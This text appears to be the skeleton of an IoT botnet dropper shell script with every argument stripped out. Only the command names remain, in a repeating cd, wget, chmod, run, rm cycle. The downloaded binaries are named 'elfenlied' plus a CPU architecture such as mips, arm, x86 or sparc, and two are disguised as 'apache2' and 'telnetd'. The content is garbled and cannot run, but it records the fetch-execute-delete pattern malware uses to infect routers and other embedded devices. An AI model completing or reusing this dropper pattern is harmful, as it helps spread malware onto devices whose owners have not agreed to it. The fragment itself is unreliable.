cd
cd
cd
cd
cd
wget
chmod
elfenliedmips
rm
cd
cd
cd
cd
cd
wget
chmod
elfenliedmipsel
rm
cd
cd
cd
cd
cd
wget
chmod
elfenliedsh4
rm
cd
cd
cd
cd
cd
wget
chmod
elfenliedx86
rm
cd
cd
cd
cd
cd
wget
chmod
elfenliedarmv6l
rm
cd
cd
cd
cd
cd
wget
chmod
elfenliedi686
rm
cd
cd
cd
cd
cd
wget
chmod
elfenliedppc
rm
cd
cd
cd
cd
cd
wget
chmod
elfenliedi586
rm
cd
cd
cd
cd
cd
wget
chmod
elfenliedm68k
rm
cd
cd
cd
cd
cd
wget
chmod
elfenliedsparc
rm
cd
cd
cd
cd
cd
wget
chmod
 
rm
cd
cd
cd
cd
cd
wget
chmod
apache2
rm
cd
cd
cd
cd
cd
wget
chmod
telnetd
rm
